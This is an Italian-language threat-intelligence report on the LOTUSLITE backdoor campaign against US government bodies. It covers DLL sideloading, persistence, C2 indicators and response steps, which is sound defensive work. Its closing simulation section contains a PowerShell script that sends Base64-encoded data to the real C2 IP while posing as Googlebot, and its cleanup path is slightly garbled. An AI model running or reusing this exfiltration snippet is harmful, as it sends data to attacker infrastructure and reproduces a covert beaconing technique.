Campagna LOTUSLITE: Spionaggio mirato guidato da narrazioni geopolitiche

Riepilogo

Acronis TRU ha osservato un’operazione di spionaggio mirata contro organizzazioni governative statunitensi che ha distribuito una backdoor DLL dannosa, LOTUSLITE, all’interno di un archivio ZIP a tema politico. Un eseguibile di caricamento compagno carica la DLL, dopodiché la backdoor invia segnali a un endpoint di C2 codificato in HTTPS mentre si maschera da Googlebot user-agent. Gli operatori stabiliscono la persistenza creando una directory ProgramData dedicata e aggiungendo una voce di registro Run. Basandosi su tecniche sovrapposte, l’attività è stata collegata a Mustang Panda.

Indagine

Gli analisti hanno estratto il ZIP e identificato il loader binario (Maduro to be taken to New York.exe) insieme alla DLL armata (kugou.dll). L’analisi ha documentato il flusso di sideloading della DLL, il comportamento dei beacon, l’uso di mutex e gli esatti artefatti di persistenza creati sull’host. La revisione dell’infrastruttura ha attribuito le comunicazioni a un unico IP (172.81.60.97) e a un dominio ospitato su spryt.net, riferito come ospitato a Phoenix, Arizona. L’attribuzione a Mustang Panda è stata valutata con moderata fiducia a causa delle tattiche condivise e dei modelli di infrastruttura.

Mitigazione

Le rilevazioni di Acronis si sono basate su hash SHA-256 per i binari dannosi e hanno evidenziato la cartella specifica di persistenza ProgramData e la posizione della chiave Run. I controlli di rete devono segnalare le connessioni HTTPS in uscita all’IP/dominio identificato quando abbinato a una stringa Googlebot user-agent. Ridurre la persistenza impedendo l’esecuzione di binari sconosciuti da ProgramData e rimuovendo la voce di registro Run associata quando scoperta.

Risposta

Isolare immediatamente gli endpoint interessati, acquisire dati volatili e conservare i binari dannosi per l’analisi. Rimuovere la cartella ProgramData creata ed eliminare il valore di registro Run corrispondente per interrompere la persistenza. Bloccare la connettività all’IP e al dominio di C2 e aggiornare le rilevazioni sugli endpoint con gli hash dei file forniti e gli indicatori mutex. Infine, condurre una ricerca a livello di ambiente per host aggiuntivi che mostrano le stesse firme di loader e DLL.

Esecuzione di Simulazione

Prerequisito: Il Controllo di Pre‑Volo Telemetria & Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

• Narrativa dell’Attacco e Comandi:
  L’attaccante ha compromesso una workstation e ha installato il backdoor LOTUSLITE. Per esfiltrare dati mentre si mimetizza con il traffico legittimo dei web crawler, il backdoor invia un HTTP POST al server di C2 codificato 172.81.60.97. Imposta esplicitamente l’intestazione User‑Agent su “Googlebot” per mascherarsi come un crawler di motori di ricerca, sperando di passare inosservato attraverso le difese perimetrali che inseriscono nella whitelist tali agenti. Il payload contiene dati esfiltrati codificati in Base64.

• Script di Test di Regressione:

  # Simulazione di C2 LOTUSLITE – powershell
  $c2 = "http://172.81.60.97/receive"
  $ua = "Googlebot"
  $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("dati sensibili"))
  $body = @{ "data" = $data }
  
  try {
      Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
      Write-Host "Richiesta C2 inviata con successo."
  } catch {
      Write-Error "Richiesta C2 fallita: $_"
  }

• Comandi di Pulizia:

  # Rimuovere qualsiasi file temporaneo o connessioni di rete residui
  Remove-Item -Path "$env:TEMLotuslite_temp*" -ErrorAction SilentlyContinue
  # (Nessun servizio persistente è stato creato in questa simulazione)
  Write-Host "Pulizia completata."